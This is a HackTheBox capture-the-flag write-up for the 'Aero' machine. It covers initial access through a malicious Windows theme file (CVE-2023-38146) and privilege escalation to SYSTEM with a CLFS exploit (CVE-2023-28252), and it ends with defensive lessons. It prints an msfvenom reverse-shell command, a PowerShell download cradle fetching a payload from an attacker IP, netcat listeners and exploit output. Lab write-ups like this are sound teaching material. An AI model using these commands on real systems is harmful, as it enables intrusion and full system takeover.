Aero is a Medium box from hackthebox, which went right to “retired” status - Let’s dive in! A
Gaining user access
As always, we’ll fire off an nmap and take a look to see if there’s a webpage - as is usually the case with hackthebox - there is!
This is a bit of a hint that the box will have something to do with a Windows 11 theme..
Further down the page, we have the opportunity to upload a theme - first of all, let’s see if this works.
We can indeed upload a theme - only the extensions .theme or .themepack are accepted - but for the purpose of testing the form a quick and dirty touch test.theme will do.
We’ll upload the file and check it out with Burp to make sure it functions as we expect…
And it appears to, there’s nothing odd here - we can upload any file with the .theme or .themepack extension.
Before we go any further, let’s google around for Windows theme exploits….
Sometimes that’s all the recon you need - we find something promising right away from threatlocker - https://www.threatlocker.com/blog/cybersecurity-in-the-news-themebleed-poc-video This article is worth a read, but for the purposes of the writeup, here’s the key part:
Assuming that the box will “open” the malicious theme file (and we can safely assume there’s a script on an HTB box which will do this) we meet all of the requirements. A bit more quick googling leads to a phyton exploit which will do most of the heavy lifting for us. https://github.com/Jnnshschl/CVE-2023-38146
The exploit needs to bind to the SMB port on 445, so we’ll run as sudo, start a listener on 8888 in my case, and then upload the generated payload to the site.
Let’s check out the exploit….
Excellent, we have a shell!
└──╼ **$**nc -nvlp 8888
listening on [any] 8888 ...
connect to [10.10.14.32] from (UNKNOWN) [10.129.229.128] 51985
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
whoami
aero\sam.emerson
PS C:\Windows\system32>
Privilege escalation to root
On a Windows machine, I really do like to take the time to enumerate home directories before we think about running WinPEAS or something similar - whereas there are plenty of excellent Linux enumeration scrips which can give you a quick overview of the box (lse.sh is great for this) most windows scripts throw out a lot of information and it can quickly get overwhelming.
On this occasion, this pays off, in Sam’s documents we have a CVE advisory!
PS C:\users\sam.emerson\Documents> dir
Directory: C:\users\sam.emerson\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/21/2023 9:18 AM 14158 CVE-2023-28252_Summary.pdf
-a---- 9/26/2023 1:06 PM 1113 watchdog.ps1
In truth we already have the CVE number so we don’t really need to exfiltrate the file, but let’s base64 it and see what we have anyway, there could be more goodies…
PS C:\users\sam.emerson\documents> [convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
[convert]::ToBase64String((Get-Content -path "CVE-2023-28252_Summary.pdf" -Encoding byte))
JVBERi0xLjYKJcOkw7zDtsOfCjIgMCBvYmoKPDwvTGVuZ3RoIDMgMCBSL0ZpbHRlci9GbGF0ZURlY29kZT4+CnN0cmVhbQp4nKVYzc6sNgzdz1Ow7mKaOCEQqarEENhf6ZP6Av2RurhS76avX/s4CRDmy7eoRswPBMc+Pj42Y552+Pfxz2AG8zQ0D8Ha
Z5zsMEX9/PHH47efhu+6gl8//nq8Ph5jeM7DROEZh4/fh593O1gzfPz5i7GGjDPejCbwMeHbzEfkYzEvs5rEr83s1lj768ffj+3j8e2tcTs+Q2OczGrJOuvNbjY72sC/gp2sMYud2WC03lr+vrD5YF+47u3K6xfjbLIb30V8THxlt667vfFPum5vZ/jN
5uzEBq3dTeItd3GIj0m21rN8ns+ahQx/rvxp1RVBgN1MvNbzqoV4ARmy5kVdZ0KkFmjybDLRiE08x+p5AziA2CVCRNs1O9vn2EDsKHBMZGHkgIq30V8AmHfyduQ<SNIP>
MDc0MDA2NTAwNzI+Ci9Qcm9kdWNlcjxGRUZGMDA0QzAwNjkwMDYyMDA3MjAwNjUwMDRGMDA2NjAwNjYwMDY5MDA2MzAwNjUwMDIwMDAzNzAwMkUwMDM0PgovQ3JlYXRpb25EYXRlKEQ6MjAyMzA5MjExODE4MTQrMDInMDAnKT4+CmVuZG9iagoKeHJl
ZgowIDE0CjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAwMDAxMzIwNSAwMDAwMCBuIAowMDAwMDAwMDE5IDAwMDAwIG4gCjAwMDAwMDE1NTAgMDAwMDAgbiAKMDAwMDAxMzMwMyAwMDAwMCBuIAowMDAwMDAxNTcxIDAwMDAwIG4gCjAwMDAwMTE5ODcgMDAw
MDAgbiAKMDAwMDAxMjAwOSAwMDAwMCBuIAowMDAwMDEyMTk3IDAwMDAwIG4gCjAwMDAwMTI3MzcgMDAwMDAgbiAKMDAwMDAxMzExOCAwMDAwMCBuIAowMDAwMDEzMTUwIDAwMDAwIG4gCjAwMDAwMTM0MDIgMDAwMDAgbiAKMDAwMDAxMzQ5OSAwMDAw
MCBuIAp0cmFpbGVyCjw8L1NpemUgMTQvUm9vdCAxMiAwIFIKL0luZm8gMTMgMCBSCi9JRCBbIDw2MjVDNEQ2QjQ3NjREOUI3QzdDQzg0OTg1MTlGQzYxMj4KPDYyNUM0RDZCNDc2NEQ5QjdDN0NDODQ5ODUxOUZDNjEyPiBdCi9Eb2NDaGVja3N1bSAv
RjBBQkY4NUJDOEIxQjkxRUYzMkVBNkM5RTUzM0QwMTQKPj4Kc3RhcnR4cmVmCjEzNjc0CiUlRU9GCg==
Back on our linux box, we can simply echo the base64 to base64 -d (decode) and output back to a PDF file.
echo -n "JVBERi0xLjYKJcOkw7zDtsOfCjIgMCBvYmoKPDwvTGVuZ3RoIDMgMCBSL0ZpbHRlci9GbGF0ZURlY29kZT4+CnN0cmVhbQp4nKVYzc6sNgzdz1Ow7mKaOCEQqarEENhf6ZP6Av2RurhS76avX/s4CRDmy7eoRswPBMc+Pj42Y552+Pfxz2AG8zQ0D8Ha
Z5zsMEX9/PHH47efhu+6gl8//nq8Ph5jeM7DROEZh4/fh593O1gzfPz5i7GGjDPejCbwMeHbzEfkYzEvs5rEr83s1lj768ffj+3j8e2tcTs+Q2OczGrJOuvNbjY72sC/gp2sMYud2WC03lr+vrD5YF+47u3K6xfjbLIb30V8THxlt667vfFPum5vZ/jN
5uzEBq3dTeItd3GIj0m21rN8ns+ahQx/rvxp1RVBgN1MvNbzqoV4ARmy5kVdZ0KkFmjybDLRiE08x+p5AziA2CVCRNs1O9vn2EDsKHBMZGHkgIq30V8AmHfyduQ<SNIP>
MDc0MDA2NTAwNzI+Ci9Qcm9kdWNlcjxGRUZGMDA0QzAwNjkwMDYyMDA3MjAwNjUwMDRGMDA2NjAwNjYwMDY5MDA2MzAwNjUwMDIwMDAzNzAwMkUwMDM0PgovQ3JlYXRpb25EYXRlKEQ6MjAyMzA5MjExODE4MTQrMDInMDAnKT4+CmVuZG9iagoKeHJl
ZgowIDE0CjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAwMDAxMzIwNSAwMDAwMCBuIAowMDAwMDAwMDE5IDAwMDAwIG4gCjAwMDAwMDE1NTAgMDAwMDAgbiAKMDAwMDAxMzMwMyAwMDAwMCBuIAowMDAwMDAxNTcxIDAwMDAwIG4gCjAwMDAwMTE5ODcgMDAw
MDAgbiAKMDAwMDAxMjAwOSAwMDAwMCBuIAowMDAwMDEyMTk3IDAwMDAwIG4gCjAwMDAwMTI3MzcgMDAwMDAgbiAKMDAwMDAxMzExOCAwMDAwMCBuIAowMDAwMDEzMTUwIDAwMDAwIG4gCjAwMDAwMTM0MDIgMDAwMDAgbiAKMDAwMDAxMzQ5OSAwMDAw
MCBuIAp0cmFpbGVyCjw8L1NpemUgMTQvUm9vdCAxMiAwIFIKL0luZm8gMTMgMCBSCi9JRCBbIDw2MjVDNEQ2QjQ3NjREOUI3QzdDQzg0OTg1MTlGQzYxMj4KPDYyNUM0RDZCNDc2NEQ5QjdDN0NDODQ5ODUxOUZDNjEyPiBdCi9Eb2NDaGVja3N1bSAv
RjBBQkY4NUJDOEIxQjkxRUYzMkVBNkM5RTUzM0QwMTQKPj4Kc3RhcnR4cmVmCjEzNjc0CiUlRU9GCg==" | base64 -d > exfil.pdf
And here we go - an overview and some remediation advice. Let’s go look up the CVE and search for a proof of concept.
We quickly find an excellent exploit here: https://github.com/fortra/CVE-2023-28252/ it’s complex, but very well documented - I’d encourage you to give it a read, I won’t go through it here though.
There’s no binary provided, so we’ll need to compile this one from scratch - since it’s a visual studio project it’s going to be easiest to fire up a Windows VM and work with it there. We know from the GitHub page that this POC will launch notepad.exe - ideally, we’d like to swap this for something more useful, so let’s identify this call in the code.
In theory, we could either generate a shell with msfvenom (or anything else you like), export it as an executable, and provide the path here - or - we could add a PowerShell command here which will spawn a reverse shell. The problem with this approach is that we’ll have to recompile the binary each time we want to use the exploit, which, frankly, is a pain. Therefore, I’m going to modify the code a bit - let’s take a binary to execute as an argument, then pass this to the “to_trigger() function”, this will allow us to compile the exploit once and then run any command we like as system.
Quick and dirty but it works well enough! Now we can compile this once and re-use it as required. This also saves me time keep transferring files between my Windows and Linux machines! My version and the compiled binary are here: https://github.com/duck-sec/CVE-2023-28252-Compiled-exe if you’ like to use them (for legitimate testing and research purposes only of course)
I’ll use msfvenom to generate a shell, and download this and my exploit to the box…
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=7777 -f exe > shell.exe
powershell "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.42:7171/shell.exe','shell.exe')"
Now, in theory, we can just run it and point it towards our shell..
PS C:\users\sam.emerson> dir
Directory: C:\users\sam.emerson
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/18/2023 1:12 PM Contacts
d-r--- 9/20/2023 5:20 AM Desktop
d-r--- 9/21/2023 2:58 PM Documents
d-r--- 9/18/2023 1:12 PM Downloads
d-r--- 9/18/2023 1:12 PM Favorites
d-r--- 9/18/2023 1:12 PM Links
d-r--- 9/18/2023 1:12 PM Music
d-r--- 9/18/2023 1:13 PM OneDrive
d-r--- 9/18/2023 1:13 PM Pictures
d-r--- 9/18/2023 1:12 PM Saved Games
d-r--- 9/18/2023 1:31 PM Searches
d-r--- 9/18/2023 1:12 PM Videos
-a---- 1/22/2024 2:31 AM 367104 exploit.exe
-a---- 1/22/2024 2:15 AM 73802 shell.exe
PS C:\users\sam.emerson> .\exploit.exe 1208 1 "C:\users\sam.emerson\shell.exe"
.\exploit.exe 1208 1 "C:\users\sam.emerson\shell.exe"
Executing command: C:\users\sam.emerson\shell.exe
ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1
VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FFA3D8E4240
[+] pool NpAt VirtualAddress -->FFFFBD038E5AA000
[+] MY EPROCESSS FFFF800FA54E60C0
[+] SYSTEM EPROCESSS FFFF800F9DEFC040
[+] _ETHREAD ADDRESS FFFF800FA158F080
[+] PREVIOUS MODE ADDRESS FFFF800FA158F2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF803736E3220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF803736FBFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80374F43010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF803755C87B0
[+] Kernel PoFxProcessorNotification --------------------------> FFFFF80374FDBD00
PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\18
[+] Base file path = C:\Users\Public\18.blf
[+] Container file name path = C:\Users\Public\.p_18
Last kernel CLFS address = FFFFBD038D2E0000
numero de tags CLFS founded 21
Last kernel CLFS address = FFFFBD0386503000
numero de tags CLFS founded 1
[+] Log file handle: 00000000000000F4
[+] Pool CLFS kernel address: FFFFBD0386503000
number of pipes created =5000
number of pipes created =4000
TRIGGER START
System_token_value: 4141414141414141
TRYING AGAIN
TRIGGER START
System_token_value: FFFFBD037BC3459B
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM
Annndd on my attacker box, we’re system! :)
└──╼ **$**nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.42] from (UNKNOWN) [10.129.8.55] 49904
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.
C:\users\sam.emerson>whoami
whoami
nt authority\system
C:\users\sam.emerson>
Avoiding the Hack - Lessons learned
Let’s deal with the second vulnerability first on this one - the privilege escalation vulnerability which we leveraged here was patched by Microsoft in April 2023 - at the time of writing, it’s January 2024. Should this be patched everywhere by now? Absolutely. Will it be patched everywhere? No chance. As is so often the case, this exploit was only possible because the software on the box was out of date and vulnerable - update your software people!
The first exploit is more interesting, while there’s clearly a vulnerability here the exploit relies on user interaction to work - that malicious theme file is worthless to an attacker unless a user opens it. Therefore, this one is as much a social engineering issue as it is a software flaw. Since this is a hackthebox box we can assume there’s a script that will open the files automatically - but you’d be shocked how often users will also open almost anything, almost automatically. Throw in a threat or dangle some kind of carrot and it’s easier than you might think to entice a user into interacting. No doubt, Cybersecurity awareness training is one of the most effective ways to reduce this risk, but to truly start to address this issue organisations need to look beyond just computer systems and the way users interact with them. This means good governance and policies which encourage users to report possible incidents rather than trying to cover them up - in my humble opinion, it also means giving employees a genuine reason to care about the well-being of the company they work for in the first place. Food for thought C-suite? :)